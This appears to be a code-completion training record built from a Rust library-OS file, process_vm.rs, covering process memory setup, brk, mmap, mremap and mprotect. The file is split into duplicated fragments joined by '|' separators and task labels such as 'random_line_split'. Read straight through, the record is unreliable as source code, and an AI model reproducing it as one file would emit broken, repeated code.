// region represented by the mem_chunks field.
mem_chunks: MemChunks,
}
impl Default for ProcessVM {
fn default() -> ProcessVM {
ProcessVM {
elf_ranges: Default::default(),
heap_range: Default::default(),
stack_range: Default::default(),
brk: Default::default(),
mem_chunks: Arc::new(RwLock::new(HashSet::new())),
}
}
}
impl Drop for ProcessVM {
fn drop(&mut self) {
let mut mem_chunks = self.mem_chunks.write().unwrap();
// There are two cases when this drop is called:
// (1) Process exits normally and in the end, drop process VM
// (2) During creating process stage, process VM is ready but there are some other errors when creating the process, e.g. spawn_attribute is set
// to a wrong value
//
// For the first case, the process VM is cleaned in the exit procedure and nothing is needed. For the second cases, mem_chunks is not empty and should
// be cleaned here.
mem_chunks
.drain_filter(|chunk| chunk.is_single_vma())
.for_each(|chunk| {
USER_SPACE_VM_MANAGER
.internal()
.munmap_chunk(&chunk, None, false);
});
assert!(mem_chunks.len() == 0);
info!("Process VM dropped");
}
}
impl ProcessVM {
pub fn mem_chunks(&self) -> &MemChunks {
&self.mem_chunks
}
pub fn stack_range(&self) -> &VMRange {
&self.stack_range
}
pub fn heap_range(&self) -> &VMRange {
&self.heap_range
}
pub fn add_mem_chunk(&self, chunk: ChunkRef) {
let mut mem_chunks = self.mem_chunks.write().unwrap();
mem_chunks.insert(chunk);
}
pub fn remove_mem_chunk(&self, chunk: &ChunkRef) {
let mut mem_chunks = self.mem_chunks.write().unwrap();
mem_chunks.remove(chunk);
}
pub fn replace_mem_chunk(&self, old_chunk: &ChunkRef, new_chunk: ChunkRef) {
self.remove_mem_chunk(old_chunk);
self.add_mem_chunk(new_chunk)
}
// Try merging all connecting single VMAs of the process.
// This is a very expensive operation.
pub fn merge_all_single_vma_chunks(
mem_chunks: &mut RwLockWriteGuard<HashSet<ChunkRef>>,
) -> Result<Vec<VMArea>> {
// Get all single VMA chunks
// Shared chunks shouldn't be merged since they are managed by shm manager and shared by multi processes
let mut single_vma_chunks = mem_chunks
.drain_filter(|chunk| chunk.is_single_vma() && !chunk.is_shared())
.collect::<Vec<ChunkRef>>();
single_vma_chunks.sort_unstable_by(|chunk_a, chunk_b| {
chunk_a
.range()
.start()
.partial_cmp(&chunk_b.range().start())
.unwrap()
});
// Try merging connecting single VMA chunks
for chunks in single_vma_chunks.windows(2) {
let chunk_a = &chunks[0];
let chunk_b = &chunks[1];
let mut vma_a = match chunk_a.internal() {
ChunkType::MultiVMA(_) => {
unreachable!();
}
ChunkType::SingleVMA(vma) => vma.lock().unwrap(),
};
let mut vma_b = match chunk_b.internal() {
ChunkType::MultiVMA(_) => {
unreachable!();
}
ChunkType::SingleVMA(vma) => vma.lock().unwrap(),
};
if VMArea::can_merge_vmas(&vma_a, &vma_b) {
let new_start = vma_a.start();
vma_b.set_start(new_start);
// set vma_a to zero
vma_a.set_end(new_start);
}
}
// Collect merged vmas which will be the output of this function
let mut merged_vmas = Vec::new();
// Insert unchanged chunks back to mem_chunks list and collect merged vmas for output
for chunk in single_vma_chunks.into_iter().filter_map(|chunk| {
if !chunk.is_single_dummy_vma() {
if chunk.is_single_vma_with_conflict_size() {
let new_vma = chunk.get_vma_for_single_vma_chunk().clone();
merged_vmas.push(new_vma);
// Don't insert the merged chunks to mem_chunk list here. It should be updated later.
None
} else {
Some(chunk)
}
} else {
None
}
}) {
mem_chunks.insert(chunk);
}
Ok(merged_vmas)
}
pub fn get_process_range(&self) -> &VMRange {
USER_SPACE_VM_MANAGER.range()
}
pub fn get_elf_ranges(&self) -> &[VMRange] {
&self.elf_ranges
}
pub fn get_heap_range(&self) -> &VMRange {
&self.heap_range
}
pub fn get_stack_range(&self) -> &VMRange {
&self.stack_range
}
pub fn get_base_addr(&self) -> usize {
self.get_process_range().start()
}
pub fn get_stack_base(&self) -> usize {
self.get_stack_range().end()
}
pub fn get_stack_limit(&self) -> usize {
self.get_stack_range().start()
}
pub fn get_brk(&self) -> usize {
*self.brk.read().unwrap()
}
pub fn brk(&self, brk: usize) -> Result<usize> {
let heap_start = self.heap_range.start();
let heap_end = self.heap_range.end();
// Acquire lock first to avoid data-race.
let mut brk_guard = self.brk.write().unwrap();
if brk >= heap_start && brk <= heap_end {
// Get page-aligned brk address.
let new_brk = align_up(brk, PAGE_SIZE);
// Get page-aligned old brk address.
let old_brk = align_up(*brk_guard, PAGE_SIZE);
// Reset the memory when brk shrinks.
if new_brk < old_brk {
let shrink_brk_range =
VMRange::new(new_brk, old_brk).expect("shrink brk range must be valid");
USER_SPACE_VM_MANAGER.reset_memory(shrink_brk_range)?;
}
// Return the user-specified brk address without page aligned. This is same as Linux.
*brk_guard = brk;
Ok(brk)
} else {
if brk < heap_start {
error!("New brk address is too low");
} else if brk > heap_end {
error!("New brk address is too high");
}
Ok(*brk_guard)
}
}
// Get a NON-accurate free size for current process
pub fn get_free_size(&self) -> usize {
let chunk_free_size = {
let process_chunks = self.mem_chunks.read().unwrap();
process_chunks
.iter()
.fold(0, |acc, chunks| acc + chunks.free_size())
};
let free_size = chunk_free_size + USER_SPACE_VM_MANAGER.free_size();
free_size
}
pub fn mmap(
&self,
addr: usize,
size: usize,
perms: VMPerms,
flags: MMapFlags,
fd: FileDesc,
offset: usize,
) -> Result<usize> {
let addr_option = {
if flags.contains(MMapFlags::MAP_FIXED) {
VMMapAddr::Force(addr)
} else {
if addr == 0 {
VMMapAddr::Any
} else {
VMMapAddr::Hint(addr)
}
}
};
let initializer = {
if flags.contains(MMapFlags::MAP_ANONYMOUS) {
// There is no need to fill zeros in mmap. Cleaning is done after munmap.
VMInitializer::DoNothing()
} else {
let file_ref = current!().file(fd)?;
// Only shared, file-backed memory mappings have write-back files
let need_write_back = if flags.contains(MMapFlags::MAP_SHARED) {
true
} else {
false
};
VMInitializer::FileBacked {
file: FileBacked::new(file_ref, offset, need_write_back),
}
}
};
let mmap_options = VMMapOptionsBuilder::default()
.size(size)
.addr(addr_option)
.perms(perms)
.initializer(initializer)
.build()?;
let mmap_addr = USER_SPACE_VM_MANAGER.mmap(&mmap_options)?;
Ok(mmap_addr)
}
pub fn mremap(
&self,
old_addr: usize,
old_size: usize,
new_size: usize,
flags: MRemapFlags,
) -> Result<usize> {
let mremap_option = VMRemapOptions::new(old_addr, old_size, new_size, flags)?;
USER_SPACE_VM_MANAGER.mremap(&mremap_option)
}
pub fn munmap(&self, addr: usize, size: usize) -> Result<()> {
USER_SPACE_VM_MANAGER.munmap(addr, size)
}
pub fn mprotect(&self, addr: usize, size: usize, perms: VMPerms) -> Result<()> {
let size = {
if size == 0 {
return Ok(());
}
align_up(size, PAGE_SIZE)
};
let protect_range = VMRange::new_with_size(addr, size)?;
return USER_SPACE_VM_MANAGER.mprotect(addr, size, perms);
}
pub fn msync(&self, addr: usize, size: usize) -> Result<()> |
pub fn msync_by_file(&self, sync_file: &FileRef) {
return USER_SPACE_VM_MANAGER.msync_by_file(sync_file);
}
// Return: a copy of the found region
pub fn find_mmap_region(&self, addr: usize) -> Result<VMRange> {
USER_SPACE_VM_MANAGER.find_mmap_region(addr)
}
}
bitflags! {
pub struct MMapFlags : u32 {
const MAP_FILE = 0x0;
const MAP_SHARED = 0x1;
const MAP_PRIVATE = 0x2;
const MAP_SHARED_VALIDATE = 0x3;
const MAP_TYPE = 0xf;
const MAP_FIXED = 0x10;
const MAP_ANONYMOUS = 0x20;
const MAP_GROWSDOWN = 0x100;
const MAP_DENYWRITE = 0x800;
const MAP_EXECUTABLE = 0x1000;
const MAP_LOCKED = 0x2000;
const MAP_NORESERVE = 0x4000;
const MAP_POPULATE = 0x8000;
const MAP_NONBLOCK = 0x10000;
const MAP_STACK = 0x20000;
const MAP_HUGETLB = 0x40000;
const MAP_SYNC = 0x80000;
const MAP_FIXED_NOREPLACE = 0x100000;
}
}
impl MMapFlags {
pub fn from_u32(bits: u32) -> Result<MMapFlags> {
// TODO: detect non-supporting flags
MMapFlags::from_bits(bits).ok_or_else(|| errno!(EINVAL, "unknown mmap flags"))
}
}
// TODO: Support MREMAP_DONTUNMAP flag (since Linux 5.7)
#[derive(Clone, Copy, Debug, PartialEq)]
pub enum MRemapFlags {
None,
MayMove,
FixedAddr(usize),
}
impl MRemapFlags {
pub fn from_raw(raw_flags: u32, new_addr: usize) -> Result<Self> {
const MREMAP_NONE: u32 = 0;
const MREMAP_MAYMOVE: u32 = 1;
const MREMAP_FIXED: u32 = 3;
#[deny(unreachable_patterns)]
let flags = match raw_flags {
MREMAP_NONE => Self::None,
MREMAP_MAYMOVE => Self::MayMove,
MREMAP_FIXED => Self::FixedAddr(new_addr),
_ => return_errno!(EINVAL, "unsupported flags"),
};
Ok(flags)
}
pub fn new_addr(&self) -> Option<usize> {
match self {
MRemapFlags::FixedAddr(new_addr) => Some(*new_addr),
_ => None,
}
}
}
impl Default for MRemapFlags {
fn default() -> Self {
MRemapFlags::None
}
}
bitflags! {
pub struct MSyncFlags : u32 {
const MS_ASYNC = 0x1;
const MS_INVALIDATE = 0x2;
const MS_SYNC = 0x4;
}
}
impl MSyncFlags {
pub fn from_u32(bits: u32) -> Result<Self> {
let flags =
MSyncFlags::from_bits(bits).ok_or_else(|| errno!(EINVAL, "containing unknown bits"))?;
if flags.contains(Self::MS_ASYNC | Self::MS_SYNC) {
return_errno!(EINVAL, "must be either sync or async");
}
Ok(flags)
}
}
| {
return USER_SPACE_VM_MANAGER.msync(addr, size);
} | identifier_body |
process_vm.rs | use super::*;
use super::chunk::*;
use super::user_space_vm::USER_SPACE_VM_MANAGER;
use super::vm_area::VMArea;
use super::vm_perms::VMPerms;
use super::vm_util::{
FileBacked, VMInitializer, VMMapAddr, VMMapOptions, VMMapOptionsBuilder, VMRemapOptions,
};
use crate::config;
use crate::ipc::SHM_MANAGER;
use crate::process::elf_file::{ElfFile, ProgramHeaderExt};
use crate::util::sync::rw_lock::RwLockWriteGuard;
use std::collections::HashSet;
// Used for heap and stack start address randomization.
const RANGE_FOR_RANDOMIZATION: usize = 256 * 4096; // 1M
#[derive(Debug, Clone)]
pub struct ProcessVMBuilder<'a, 'b> {
elfs: Vec<&'b ElfFile<'a>>,
heap_size: Option<usize>,
stack_size: Option<usize>,
mmap_size: Option<usize>,
}
impl<'a, 'b> ProcessVMBuilder<'a, 'b> {
pub fn new(elfs: Vec<&'b ElfFile<'a>>) -> ProcessVMBuilder<'a, 'b> {
ProcessVMBuilder {
elfs: elfs,
heap_size: None,
stack_size: None,
mmap_size: None,
}
}
pub fn set_heap_size(&mut self, heap_size: usize) -> &mut Self {
self.heap_size = Some(heap_size);
self
}
pub fn set_stack_size(&mut self, stack_size: usize) -> &mut Self {
self.stack_size = Some(stack_size);
self
}
pub fn set_mmap_size(&mut self, mmap_size: usize) -> &mut Self {
self.mmap_size = Some(mmap_size);
self
}
// Generate a random address within [0, range]
// Note: This function doesn't guarantee alignment
fn get_randomize_offset(range: usize) -> usize {
if cfg!(debug_assertions) {
return range;
}
use crate::misc;
trace!("entropy size = {}", range);
let mut random_buf: [u8; 8] = [0u8; 8]; // same length as usize
misc::get_random(&mut random_buf).expect("failed to get random number");
let random_num: usize = u64::from_le_bytes(random_buf) as usize;
random_num % range
}
pub fn build(self) -> Result<ProcessVM> {
self.validate()?;
let heap_size = self
.heap_size
.unwrap_or(config::LIBOS_CONFIG.process.default_heap_size);
let stack_size = self
.stack_size
.unwrap_or(config::LIBOS_CONFIG.process.default_stack_size);
// Before allocating memory, let's first calculate how much memory
// we need in total by iterating the memory layouts required by
// all the memory regions
let elf_layouts: Vec<VMLayout> = self
.elfs
.iter()
.map(|elf| {
elf.program_headers()
.filter(|segment| segment.loadable())
.fold(VMLayout::new_empty(), |mut elf_layout, segment| { | elf_layout.extend(&segment_layout);
elf_layout
})
})
.collect();
// Make heap and stack 16-byte aligned
let other_layouts = vec![
VMLayout::new(heap_size, 16)?,
VMLayout::new(stack_size, 16)?,
];
let process_layout = elf_layouts.iter().chain(other_layouts.iter()).fold(
VMLayout::new_empty(),
|mut process_layout, sub_layout| {
process_layout.add(&sub_layout);
process_layout
},
);
// Now that we end up with the memory layout required by the process,
// let's allocate the memory for the process
let mut chunks = HashSet::new();
// Init the memory for ELFs in the process
let mut elf_ranges = Vec::with_capacity(2);
elf_layouts
.iter()
.zip(self.elfs.iter())
.map(|(elf_layout, elf_file)| {
let vm_option = VMMapOptionsBuilder::default()
.size(elf_layout.size())
.align(elf_layout.align())
.perms(VMPerms::ALL) // set it to read | write | exec for simplicity
.initializer(VMInitializer::ElfSpecific {
elf_file: elf_file.file_ref().clone(),
})
.build()
.map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
let (elf_range, chunk_ref) =
USER_SPACE_VM_MANAGER.alloc(&vm_option).map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
debug_assert!(elf_range.start() % elf_layout.align() == 0);
chunks.insert(chunk_ref);
Self::init_elf_memory(&elf_range, elf_file).map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
trace!("elf range = {:?}", elf_range);
elf_ranges.push(elf_range);
Ok(())
})
.collect::<Result<()>>()?;
// Init the heap memory in the process
let heap_layout = &other_layouts[0];
let vm_option = VMMapOptionsBuilder::default()
.size(heap_layout.size())
.align(heap_layout.align())
.perms(VMPerms::READ | VMPerms::WRITE)
.build()
.map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
let (heap_range, chunk_ref) = USER_SPACE_VM_MANAGER.alloc(&vm_option).map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
debug_assert!(heap_range.start() % heap_layout.align() == 0);
trace!("heap range = {:?}", heap_range);
let brk = RwLock::new(heap_range.start());
chunks.insert(chunk_ref);
// Init the stack memory in the process
let stack_layout = &other_layouts[1];
let vm_option = VMMapOptionsBuilder::default()
.size(stack_layout.size())
.align(heap_layout.align())
.perms(VMPerms::READ | VMPerms::WRITE)
.build()
.map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
let (stack_range, chunk_ref) = USER_SPACE_VM_MANAGER.alloc(&vm_option).map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
debug_assert!(stack_range.start() % stack_layout.align() == 0);
chunks.insert(chunk_ref);
trace!("stack range = {:?}", stack_range);
let mem_chunks = Arc::new(RwLock::new(chunks));
Ok(ProcessVM {
elf_ranges,
heap_range,
stack_range,
brk,
mem_chunks,
})
}
fn validate(&self) -> Result<()> {
let validate_size = |size_opt| -> Result<()> {
if let Some(size) = size_opt {
if size == 0 || size % PAGE_SIZE != 0 {
return_errno!(EINVAL, "invalid size");
}
}
Ok(())
};
validate_size(self.heap_size)?;
validate_size(self.stack_size)?;
validate_size(self.mmap_size)?;
Ok(())
}
fn handle_error_when_init(&self, chunks: &HashSet<Arc<Chunk>>) {
chunks.iter().for_each(|chunk| {
USER_SPACE_VM_MANAGER
.internal()
.munmap_chunk(chunk, None, false);
});
}
fn init_elf_memory(elf_range: &VMRange, elf_file: &ElfFile) -> Result<()> {
// Destination buffer: ELF appeared in the process
let elf_proc_buf = unsafe { elf_range.as_slice_mut() };
// Source buffer: ELF stored in the ELF file
let elf_file_buf = elf_file.as_slice();
let base_load_address_offset = elf_file.base_load_address_offset() as usize;
// Offsets to track zerolized range
let mut empty_start_offset = 0;
let mut empty_end_offset = 0;
// Init all loadable segments
elf_file
.program_headers()
.filter(|segment| segment.loadable())
.for_each(|segment| {
let file_size = segment.p_filesz as usize;
let file_offset = segment.p_offset as usize;
let mem_addr = segment.p_vaddr as usize;
let mem_size = segment.p_memsz as usize;
let alignment = segment.p_align as usize;
debug_assert!(file_size <= mem_size);
let mem_start_offset = mem_addr - base_load_address_offset;
// Initialize empty part to zero based on alignment
empty_start_offset = align_down(mem_start_offset, alignment);
for b in &mut elf_proc_buf[empty_start_offset..mem_start_offset] {
*b = 0;
}
// Bytes of file_size length are loaded from the ELF file
elf_file.file_ref().read_at(
file_offset,
&mut elf_proc_buf[mem_start_offset..mem_start_offset + file_size],
);
// Set the remaining part to zero based on alignment
debug_assert!(file_size <= mem_size);
empty_end_offset = align_up(mem_start_offset + mem_size, alignment);
for b in &mut elf_proc_buf[mem_start_offset + file_size..empty_end_offset] {
*b = 0;
}
});
Ok(())
}
}
// MemChunks is the structure to track all the chunks which are used by this process.
type MemChunks = Arc<RwLock<HashSet<ChunkRef>>>;
/// The per-process virtual memory
#[derive(Debug)]
pub struct ProcessVM {
elf_ranges: Vec<VMRange>,
heap_range: VMRange,
stack_range: VMRange,
brk: RwLock<usize>,
// Memory safety notes: the mem_chunks field must be the last one.
//
// Rust drops fields in the same order as they are declared. So by making
// mem_chunks the last field, we ensure that when all other fields are
// dropped, their drop methods (if provided) can still access the memory
// region represented by the mem_chunks field.
mem_chunks: MemChunks,
}
impl Default for ProcessVM {
fn default() -> ProcessVM {
ProcessVM {
elf_ranges: Default::default(),
heap_range: Default::default(),
stack_range: Default::default(),
brk: Default::default(),
mem_chunks: Arc::new(RwLock::new(HashSet::new())),
}
}
}
impl Drop for ProcessVM {
fn drop(&mut self) {
let mut mem_chunks = self.mem_chunks.write().unwrap();
// There are two cases when this drop is called:
// (1) Process exits normally and in the end, drop process VM
// (2) During creating process stage, process VM is ready but there are some other errors when creating the process, e.g. spawn_attribute is set
// to a wrong value
//
// For the first case, the process VM is cleaned in the exit procedure and nothing is needed. For the second cases, mem_chunks is not empty and should
// be cleaned here.
mem_chunks
.drain_filter(|chunk| chunk.is_single_vma())
.for_each(|chunk| {
USER_SPACE_VM_MANAGER
.internal()
.munmap_chunk(&chunk, None, false);
});
assert!(mem_chunks.len() == 0);
info!("Process VM dropped");
}
}
impl ProcessVM {
pub fn mem_chunks(&self) -> &MemChunks {
&self.mem_chunks
}
pub fn stack_range(&self) -> &VMRange {
&self.stack_range
}
pub fn heap_range(&self) -> &VMRange {
&self.heap_range
}
pub fn add_mem_chunk(&self, chunk: ChunkRef) {
let mut mem_chunks = self.mem_chunks.write().unwrap();
mem_chunks.insert(chunk);
}
pub fn remove_mem_chunk(&self, chunk: &ChunkRef) {
let mut mem_chunks = self.mem_chunks.write().unwrap();
mem_chunks.remove(chunk);
}
pub fn replace_mem_chunk(&self, old_chunk: &ChunkRef, new_chunk: ChunkRef) {
self.remove_mem_chunk(old_chunk);
self.add_mem_chunk(new_chunk)
}
// Try merging all connecting single VMAs of the process.
// This is a very expensive operation.
pub fn merge_all_single_vma_chunks(
mem_chunks: &mut RwLockWriteGuard<HashSet<ChunkRef>>,
) -> Result<Vec<VMArea>> {
// Get all single VMA chunks
// Shared chunks shouldn't be merged since they are managed by shm manager and shared by multi processes
let mut single_vma_chunks = mem_chunks
.drain_filter(|chunk| chunk.is_single_vma() && !chunk.is_shared())
.collect::<Vec<ChunkRef>>();
single_vma_chunks.sort_unstable_by(|chunk_a, chunk_b| {
chunk_a
.range()
.start()
.partial_cmp(&chunk_b.range().start())
.unwrap()
});
// Try merging connecting single VMA chunks
for chunks in single_vma_chunks.windows(2) {
let chunk_a = &chunks[0];
let chunk_b = &chunks[1];
let mut vma_a = match chunk_a.internal() {
ChunkType::MultiVMA(_) => {
unreachable!();
}
ChunkType::SingleVMA(vma) => vma.lock().unwrap(),
};
let mut vma_b = match chunk_b.internal() {
ChunkType::MultiVMA(_) => {
unreachable!();
}
ChunkType::SingleVMA(vma) => vma.lock().unwrap(),
};
if VMArea::can_merge_vmas(&vma_a, &vma_b) {
let new_start = vma_a.start();
vma_b.set_start(new_start);
// set vma_a to zero
vma_a.set_end(new_start);
}
}
// Collect merged vmas which will be the output of this function
let mut merged_vmas = Vec::new();
// Insert unchanged chunks back to mem_chunks list and collect merged vmas for output
for chunk in single_vma_chunks.into_iter().filter_map(|chunk| {
if !chunk.is_single_dummy_vma() {
if chunk.is_single_vma_with_conflict_size() {
let new_vma = chunk.get_vma_for_single_vma_chunk().clone();
merged_vmas.push(new_vma);
// Don't insert the merged chunks to mem_chunk list here. It should be updated later.
None
} else {
Some(chunk)
}
} else {
None
}
}) {
mem_chunks.insert(chunk);
}
Ok(merged_vmas)
}
pub fn get_process_range(&self) -> &VMRange {
USER_SPACE_VM_MANAGER.range()
}
pub fn get_elf_ranges(&self) -> &[VMRange] {
&self.elf_ranges
}
pub fn get_heap_range(&self) -> &VMRange {
&self.heap_range
}
pub fn get_stack_range(&self) -> &VMRange {
&self.stack_range
}
pub fn get_base_addr(&self) -> usize {
self.get_process_range().start()
}
pub fn get_stack_base(&self) -> usize {
self.get_stack_range().end()
}
pub fn get_stack_limit(&self) -> usize {
self.get_stack_range().start()
}
pub fn get_brk(&self) -> usize {
*self.brk.read().unwrap()
}
pub fn brk(&self, brk: usize) -> Result<usize> {
let heap_start = self.heap_range.start();
let heap_end = self.heap_range.end();
// Acquire lock first to avoid data-race.
let mut brk_guard = self.brk.write().unwrap();
if brk >= heap_start && brk <= heap_end {
// Get page-aligned brk address.
let new_brk = align_up(brk, PAGE_SIZE);
// Get page-aligned old brk address.
let old_brk = align_up(*brk_guard, PAGE_SIZE);
// Reset the memory when brk shrinks.
if new_brk < old_brk {
let shrink_brk_range =
VMRange::new(new_brk, old_brk).expect("shrink brk range must be valid");
USER_SPACE_VM_MANAGER.reset_memory(shrink_brk_range)?;
}
// Return the user-specified brk address without page aligned. This is same as Linux.
*brk_guard = brk;
Ok(brk)
} else {
if brk < heap_start {
error!("New brk address is too low");
} else if brk > heap_end {
error!("New brk address is too high");
}
Ok(*brk_guard)
}
}
// Get a NON-accurate free size for current process
pub fn get_free_size(&self) -> usize {
let chunk_free_size = {
let process_chunks = self.mem_chunks.read().unwrap();
process_chunks
.iter()
.fold(0, |acc, chunks| acc + chunks.free_size())
};
let free_size = chunk_free_size + USER_SPACE_VM_MANAGER.free_size();
free_size
}
pub fn mmap(
&self,
addr: usize,
size: usize,
perms: VMPerms,
flags: MMapFlags,
fd: FileDesc,
offset: usize,
) -> Result<usize> {
let addr_option = {
if flags.contains(MMapFlags::MAP_FIXED) {
VMMapAddr::Force(addr)
} else {
if addr == 0 {
VMMapAddr::Any
} else {
VMMapAddr::Hint(addr)
}
}
};
let initializer = {
if flags.contains(MMapFlags::MAP_ANONYMOUS) {
// There is no need to fill zeros in mmap. Cleaning is done after munmap.
VMInitializer::DoNothing()
} else {
let file_ref = current!().file(fd)?;
// Only shared, file-backed memory mappings have write-back files
let need_write_back = if flags.contains(MMapFlags::MAP_SHARED) {
true
} else {
false
};
VMInitializer::FileBacked {
file: FileBacked::new(file_ref, offset, need_write_back),
}
}
};
let mmap_options = VMMapOptionsBuilder::default()
.size(size)
.addr(addr_option)
.perms(perms)
.initializer(initializer)
.build()?;
let mmap_addr = USER_SPACE_VM_MANAGER.mmap(&mmap_options)?;
Ok(mmap_addr)
}
pub fn mremap(
&self,
old_addr: usize,
old_size: usize,
new_size: usize,
flags: MRemapFlags,
) -> Result<usize> {
let mremap_option = VMRemapOptions::new(old_addr, old_size, new_size, flags)?;
USER_SPACE_VM_MANAGER.mremap(&mremap_option)
}
pub fn munmap(&self, addr: usize, size: usize) -> Result<()> {
USER_SPACE_VM_MANAGER.munmap(addr, size)
}
pub fn mprotect(&self, addr: usize, size: usize, perms: VMPerms) -> Result<()> {
let size = {
if size == 0 {
return Ok(());
}
align_up(size, PAGE_SIZE)
};
let protect_range = VMRange::new_with_size(addr, size)?;
return USER_SPACE_VM_MANAGER.mprotect(addr, size, perms);
}
pub fn msync(&self, addr: usize, size: usize) -> Result<()> {
return USER_SPACE_VM_MANAGER.msync(addr, size);
}
pub fn msync_by_file(&self, sync_file: &FileRef) {
return USER_SPACE_VM_MANAGER.msync_by_file(sync_file);
}
// Return: a copy of the found region
pub fn find_mmap_region(&self, addr: usize) -> Result<VMRange> {
USER_SPACE_VM_MANAGER.find_mmap_region(addr)
}
}
bitflags! {
pub struct MMapFlags : u32 {
const MAP_FILE = 0x0;
const MAP_SHARED = 0x1;
const MAP_PRIVATE = 0x2;
const MAP_SHARED_VALIDATE = 0x3;
const MAP_TYPE = 0xf;
const MAP_FIXED = 0x10;
const MAP_ANONYMOUS = 0x20;
const MAP_GROWSDOWN = 0x100;
const MAP_DENYWRITE = 0x800;
const MAP_EXECUTABLE = 0x1000;
const MAP_LOCKED = 0x2000;
const MAP_NORESERVE = 0x4000;
const MAP_POPULATE = 0x8000;
const MAP_NONBLOCK = 0x10000;
const MAP_STACK = 0x20000;
const MAP_HUGETLB = 0x40000;
const MAP_SYNC = 0x80000;
const MAP_FIXED_NOREPLACE = 0x100000;
}
}
impl MMapFlags {
pub fn from_u32(bits: u32) -> Result<MMapFlags> {
// TODO: detect non-supporting flags
MMapFlags::from_bits(bits).ok_or_else(|| errno!(EINVAL, "unknown mmap flags"))
}
}
// TODO: Support MREMAP_DONTUNMAP flag (since Linux 5.7)
#[derive(Clone, Copy, Debug, PartialEq)]
pub enum MRemapFlags {
None,
MayMove,
FixedAddr(usize),
}
impl MRemapFlags {
pub fn from_raw(raw_flags: u32, new_addr: usize) -> Result<Self> {
const MREMAP_NONE: u32 = 0;
const MREMAP_MAYMOVE: u32 = 1;
const MREMAP_FIXED: u32 = 3;
#[deny(unreachable_patterns)]
let flags = match raw_flags {
MREMAP_NONE => Self::None,
MREMAP_MAYMOVE => Self::MayMove,
MREMAP_FIXED => Self::FixedAddr(new_addr),
_ => return_errno!(EINVAL, "unsupported flags"),
};
Ok(flags)
}
pub fn new_addr(&self) -> Option<usize> {
match self {
MRemapFlags::FixedAddr(new_addr) => Some(*new_addr),
_ => None,
}
}
}
impl Default for MRemapFlags {
fn default() -> Self {
MRemapFlags::None
}
}
bitflags! {
pub struct MSyncFlags : u32 {
const MS_ASYNC = 0x1;
const MS_INVALIDATE = 0x2;
const MS_SYNC = 0x4;
}
}
impl MSyncFlags {
pub fn from_u32(bits: u32) -> Result<Self> {
let flags =
MSyncFlags::from_bits(bits).ok_or_else(|| errno!(EINVAL, "containing unknown bits"))?;
if flags.contains(Self::MS_ASYNC | Self::MS_SYNC) {
return_errno!(EINVAL, "must be either sync or async");
}
Ok(flags)
}
} | let segment_size = (segment.p_vaddr + segment.p_memsz) as usize;
let segment_align = segment.p_align as usize;
let segment_layout = VMLayout::new(segment_size, segment_align).unwrap(); | random_line_split |
process_vm.rs | use super::*;
use super::chunk::*;
use super::user_space_vm::USER_SPACE_VM_MANAGER;
use super::vm_area::VMArea;
use super::vm_perms::VMPerms;
use super::vm_util::{
FileBacked, VMInitializer, VMMapAddr, VMMapOptions, VMMapOptionsBuilder, VMRemapOptions,
};
use crate::config;
use crate::ipc::SHM_MANAGER;
use crate::process::elf_file::{ElfFile, ProgramHeaderExt};
use crate::util::sync::rw_lock::RwLockWriteGuard;
use std::collections::HashSet;
// Used for heap and stack start address randomization.
const RANGE_FOR_RANDOMIZATION: usize = 256 * 4096; // 1M
#[derive(Debug, Clone)]
pub struct ProcessVMBuilder<'a, 'b> {
elfs: Vec<&'b ElfFile<'a>>,
heap_size: Option<usize>,
stack_size: Option<usize>,
mmap_size: Option<usize>,
}
impl<'a, 'b> ProcessVMBuilder<'a, 'b> {
pub fn new(elfs: Vec<&'b ElfFile<'a>>) -> ProcessVMBuilder<'a, 'b> {
ProcessVMBuilder {
elfs: elfs,
heap_size: None,
stack_size: None,
mmap_size: None,
}
}
pub fn set_heap_size(&mut self, heap_size: usize) -> &mut Self {
self.heap_size = Some(heap_size);
self
}
pub fn set_stack_size(&mut self, stack_size: usize) -> &mut Self {
self.stack_size = Some(stack_size);
self
}
pub fn set_mmap_size(&mut self, mmap_size: usize) -> &mut Self {
self.mmap_size = Some(mmap_size);
self
}
// Generate a random address within [0, range]
// Note: This function doesn't guarantee alignment
fn get_randomize_offset(range: usize) -> usize {
if cfg!(debug_assertions) {
return range;
}
use crate::misc;
trace!("entropy size = {}", range);
let mut random_buf: [u8; 8] = [0u8; 8]; // same length as usize
misc::get_random(&mut random_buf).expect("failed to get random number");
let random_num: usize = u64::from_le_bytes(random_buf) as usize;
random_num % range
}
pub fn build(self) -> Result<ProcessVM> {
self.validate()?;
let heap_size = self
.heap_size
.unwrap_or(config::LIBOS_CONFIG.process.default_heap_size);
let stack_size = self
.stack_size
.unwrap_or(config::LIBOS_CONFIG.process.default_stack_size);
// Before allocating memory, let's first calculate how much memory
// we need in total by iterating the memory layouts required by
// all the memory regions
let elf_layouts: Vec<VMLayout> = self
.elfs
.iter()
.map(|elf| {
elf.program_headers()
.filter(|segment| segment.loadable())
.fold(VMLayout::new_empty(), |mut elf_layout, segment| {
let segment_size = (segment.p_vaddr + segment.p_memsz) as usize;
let segment_align = segment.p_align as usize;
let segment_layout = VMLayout::new(segment_size, segment_align).unwrap();
elf_layout.extend(&segment_layout);
elf_layout
})
})
.collect();
// Make heap and stack 16-byte aligned
let other_layouts = vec![
VMLayout::new(heap_size, 16)?,
VMLayout::new(stack_size, 16)?,
];
let process_layout = elf_layouts.iter().chain(other_layouts.iter()).fold(
VMLayout::new_empty(),
|mut process_layout, sub_layout| {
process_layout.add(&sub_layout);
process_layout
},
);
// Now that we end up with the memory layout required by the process,
// let's allocate the memory for the process
let mut chunks = HashSet::new();
// Init the memory for ELFs in the process
let mut elf_ranges = Vec::with_capacity(2);
elf_layouts
.iter()
.zip(self.elfs.iter())
.map(|(elf_layout, elf_file)| {
let vm_option = VMMapOptionsBuilder::default()
.size(elf_layout.size())
.align(elf_layout.align())
.perms(VMPerms::ALL) // set it to read | write | exec for simplicity
.initializer(VMInitializer::ElfSpecific {
elf_file: elf_file.file_ref().clone(),
})
.build()
.map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
let (elf_range, chunk_ref) =
USER_SPACE_VM_MANAGER.alloc(&vm_option).map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
debug_assert!(elf_range.start() % elf_layout.align() == 0);
chunks.insert(chunk_ref);
